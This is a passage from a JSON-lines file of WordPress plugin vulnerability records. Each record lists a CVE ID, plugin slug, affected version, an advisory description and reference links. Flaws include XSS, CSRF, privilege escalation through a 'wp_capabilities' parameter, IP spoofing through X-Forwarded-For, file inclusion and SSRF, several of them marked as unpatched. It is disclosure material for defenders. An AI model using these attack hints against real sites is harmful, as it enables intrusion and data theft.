database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/Assistant.php?rev=3207037#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/Assistant.php?rev=3207037#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/Audits.php?rev=3207037#L86\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/Audits.php?rev=3207037#L86\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/BulkSeo.php?rev=3207037#L148\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/BulkSeo.php?rev=3207037#L148\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/FocusPages.php?rev=3207037#L107\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/FocusPages.php?rev=3207037#L107\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/Onboarding.php?rev=3207037#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/Onboarding.php?rev=3207037#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/Post.php?rev=3207037#L480\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/Post.php?rev=3207037#L480\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/models\\\/Snippet.php?rev=3207037#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/models\\\/Snippet.php?rev=3207037#L118\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/models\\\/Snippet.php?rev=3207037#L96\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/models\\\/Snippet.php?rev=3207037#L96\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3248412\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3248412\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250395\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250395\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/squirrly-seo\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/squirrly-seo\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a23ee5c-275f-4d51-8199-1cc2b0086f73?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a23ee5c-275f-4d51-8199-1cc2b0086f73?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4588","slug":"360-sphere-images","versionImpact":"1.3","description":"The 360 Photo Spheres plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sphere' shortcode in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/360-sphere-images\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/360-sphere-images\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a654ee62-8742-49bc-95fd-bfab14750b50?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a654ee62-8742-49bc-95fd-bfab14750b50?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4935","slug":"wc-multivendor-marketplace","versionImpact":"3.4.11","description":"The WCFM Marketplace plugin for WordPress is vulnerable to unauthorized modification and access of data in versions up to, and including, 3.4.11 due to missing capability checks on various AJAX actions. This makes it possible for authenticated attackers, with minimal permissions such as subscribers, to perform a wide variety of actions such as modifying shipping method details, modifying products, deleting arbitrary posts, and privilege escalation (via the wp_ajax_wcfm_vendor_store_online AJAX action).","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2630696%40wc-multivendor-marketplace&new=2630696%40wc-multivendor-marketplace&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2630696%40wc-multivendor-marketplace&new=2630696%40wc-multivendor-marketplace&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85730e9b-c5da-473c-a324-891c5c9f7ba3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85730e9b-c5da-473c-a324-891c5c9f7ba3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2303","slug":"lead-capturing-call-to-actions-by-vcita","versionImpact":"2.6.4","description":"The Contact Form and Calls To Action by vcita plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.6.4. This is due to missing nonce validation in the vcita-callback.php file. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-capturing-call-to-actions-by-vcita\\\/trunk\\\/vcita-callback.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-capturing-call-to-actions-by-vcita\\\/trunk\\\/vcita-callback.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2345c972-9fd4-4709-8bde-315ab54f60e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2345c972-9fd4-4709-8bde-315ab54f60e2?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"name\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-35093","slug":"masterstudy-lms-learning-management-system","versionImpact":"3.0.7","description":"Broken Access Control vulnerability in StylemixThemes MasterStudy LMS WordPress Plugin \u2013 for Online Courses and Education plugin <=\u00a03.0.8 versions allows\u00a0any logged-in users, such as subscribers to view the \"Orders\" of the plugin and get the data related to the order like\u00a0email, username, and more.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/masterstudy-lms-learning-management-system\\\/wordpress-masterstudy-lms-plugin-3-0-7-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/masterstudy-lms-learning-management-system\\\/wordpress-masterstudy-lms-plugin-3-0-7-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4242","slug":"full-customer","versionImpact":"2.2.3","description":"The FULL - Customer plugin for WordPress is vulnerable to Information Disclosure via the \/health REST route in versions up to, and including, 2.2.3 due to improper authorization. This allows authenticated attackers with subscriber-level permissions and above to obtain sensitive information about the site configuration as disclosed by the WordPress health check.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a77d0fb5-8829-407d-a40a-169cf0c5f837?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a77d0fb5-8829-407d-a40a-169cf0c5f837?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/1.1.0\\\/app\\\/api\\\/Health.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/1.1.0\\\/app\\\/api\\\/Health.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6845","slug":"commenttweets","versionImpact":"0.6","description":"The CommentTweets WordPress plugin through 0.6 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cbdaf158-f277-4be4-b022-68d18dae4c55\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cbdaf158-f277-4be4-b022-68d18dae4c55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/2023-6845\",\"name\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/2023-6845\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0604","slug":"foogallery","versionImpact":"2.4.7","description":"The Best WordPress Gallery Plugin \u2013 FooGallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.4.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d17d9610-d0fd-419d-a7ea-e9c313f1c542?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d17d9610-d0fd-419d-a7ea-e9c313f1c542?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2024-0604\",\"name\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2024-0604\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Ffoogallery%2Ftags%2F2.4.7&old=3035688&new_path=%2Ffoogallery%2Ftags%2F2.4.9&new=3035688&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Ffoogallery%2Ftags%2F2.4.7&old=3035688&new_path=%2Ffoogallery%2Ftags%2F2.4.9&new=3035688&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2460","slug":"gamipress-button","versionImpact":"1.0.7","description":"The GamiPress \u2013 Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gamipress_button' shortcode in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af39e563-5d88-460d-b02d-1aaa111c89dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af39e563-5d88-460d-b02d-1aaa111c89dd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3051778%40gamipress-button&new=3051778%40gamipress-button&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3051778%40gamipress-button&new=3051778%40gamipress-button&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4532","slug":"login-attempts-limit-wp","versionImpact":"2.1","description":"The LOGIN AND REGISTRATION ATTEMPTS LIMIT plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 2.1. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address from logging in.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50421e90-ccd6-4896-8041-b99279314301?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50421e90-ccd6-4896-8041-b99279314301?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-attempts-limit-wp\\\/trunk\\\/includes\\\/Ip.php#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-attempts-limit-wp\\\/trunk\\\/includes\\\/Ip.php#L41\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9067","slug":"youzify","versionImpact":"1.3.0","description":"The Youzify \u2013 BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'delete_attachment' function in all versions up to, and including, 1.3.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary attachments.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e099d8e2-6305-43fc-8807-a37791deb2ff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e099d8e2-6305-43fc-8807-a37791deb2ff?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youzify\\\/trunk\\\/includes\\\/public\\\/core\\\/class-youzify-attachments.php#L1183\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youzify\\\/trunk\\\/includes\\\/public\\\/core\\\/class-youzify-attachments.php#L1183\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9607","slug":"wd-facebook-feed","versionImpact":"1.2.9","description":"The 10Web Social Post Feed plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.2.9. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. Please note this is only exploitable when the leave a review notice is present.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be151552-827c-43a6-a0e0-da19884448fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be151552-827c-43a6-a0e0-da19884448fd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wd-facebook-feed\\\/trunk\\\/wd\\\/includes\\\/notices.php#L204\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wd-facebook-feed\\\/trunk\\\/wd\\\/includes\\\/notices.php#L204\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11378","slug":"bizapp-for-woocommerce","versionImpact":"2.0.8","description":"The Bizapp for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'error' parameter in all versions up to, and including, 2.0.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bizapp-for-woocommerce\\\/trunk\\\/admin\\\/class-bizapp-woocommerce-order.php#L599\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bizapp-for-woocommerce\\\/trunk\\\/admin\\\/class-bizapp-woocommerce-order.php#L599\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45cf9e0e-3a8a-400a-b766-7b352e739b7c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45cf9e0e-3a8a-400a-b766-7b352e739b7c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13098","slug":"wp-email-newsletter","versionImpact":"1.1","description":"The WordPress Email Newsletter WordPress plugin through 1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eac71f70-993e-4353-8550-affb24c61c02\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eac71f70-993e-4353-8550-affb24c61c02\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13592","slug":"team-builder-for-wpbakery-page-builder","versionImpact":"1.0","description":"The Team Builder For WPBakery Page Builder(Formerly Visual Composer) plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.0 via the 'team-builder-vc' shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-builder-for-wpbakery-page-builder\\\/tags\\\/1.0\\\/plugin.class.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-builder-for-wpbakery-page-builder\\\/tags\\\/1.0\\\/plugin.class.php#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee7e8d76-a461-4b0b-a312-c6ea4b8ac375?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee7e8d76-a461-4b0b-a312-c6ea4b8ac375?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12634","slug":"related-post","description":"The Related Posts, Inline Related Posts, Contextual Related Posts, Related Content By PickPlugins plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including 2.0.59. This is due to missing nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/related-post\\\/tags\\\/2.0.58b\\\/includes\\\/menu\\\/settings.php#L129\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/related-post\\\/tags\\\/2.0.58b\\\/includes\\\/menu\\\/settings.php#L129\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251482\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251482\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/related-post\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/related-post\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29d22612-8e0d-4275-b370-9729352c951e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29d22612-8e0d-4275-b370-9729352c951e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6798","slug":"dl-verification","versionImpact":"1.2","description":"The DL Verification WordPress plugin through 1.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c719922e-b2b3-452f-856a-5cc983a4ac18\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c719922e-b2b3-452f-856a-5cc983a4ac18\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8146","slug":"qi-addons-for-elementor","versionImpact":"1.9.2","description":"The Qi Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's TypeOut Text widget in all versions up to, and including, 1.9.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3335762\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3335762\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/qi-addons-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/qi-addons-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4fdfdcbe-014b-4b68-9ac5-976d384106c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4fdfdcbe-014b-4b68-9ac5-976d384106c3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4580","slug":"twenty20","versionImpact":"1.5.9","description":"The Twenty20 Image Before-After WordPress plugin through 1.5.9 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e54804c7-68a9-4c4c-94f9-1c3c9b97e8ca\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e54804c7-68a9-4c4c-94f9-1c3c9b97e8ca\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2302","slug":"lead-capturing-call-to-actions-by-vcita","versionImpact":"2.6.4","description":"The Contact Form and Calls To Action by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'email' parameter in versions up to, and including, 2.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with the edit_posts capability, such as contributors and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-capturing-call-to-actions-by-vcita\\\/trunk\\\/vcita-callback.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-capturing-call-to-actions-by-vcita\\\/trunk\\\/vcita-callback.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4dfc237a-9157-4da9-ba8f-9daf2ba4f20b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4dfc237a-9157-4da9-ba8f-9daf2ba4f20b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"name\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4239","slug":"real-estate-manager","versionImpact":"6.7.1","description":"The Real Estate Manager plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 6.7.1 due to insufficient restriction on the 'rem_save_profile_front' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'wp_capabilities' parameter during a profile update.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/real-estate-manager\\\/tags\\\/6.7.1\\\/classes\\\/shortcodes.class.php#L1439\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/real-estate-manager\\\/tags\\\/6.7.1\\\/classes\\\/shortcodes.class.php#L1439\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d83d1fd0-6e21-406e-a7c0-89d26eabbb32?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d83d1fd0-6e21-406e-a7c0-89d26eabbb32?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-1751","slug":"wp-skitter-slideshow","versionImpact":"2.5.2","description":"The Skitter Slideshow plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.5.2 via the \/image.php file. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/175eba7e-454b-4ba3-bbb5-22bd56734f5c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/175eba7e-454b-4ba3-bbb5-22bd56734f5c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/securityforeveryone.com\\\/blog\\\/wordpress-skitter-slideshow-ssrf-0-day-vulnerability-cve-2022-1751\",\"name\":\"https:\\\/\\\/securityforeveryone.com\\\/blog\\\/wordpress-skitter-slideshow-ssrf-0-day-vulnerability-cve-2022-1751\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-skitter-slideshow\\\/trunk\\\/image.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-skitter-slideshow\\\/trunk\\\/image.php\",\"refsource\":\"\",\"tags\":[]}]"}
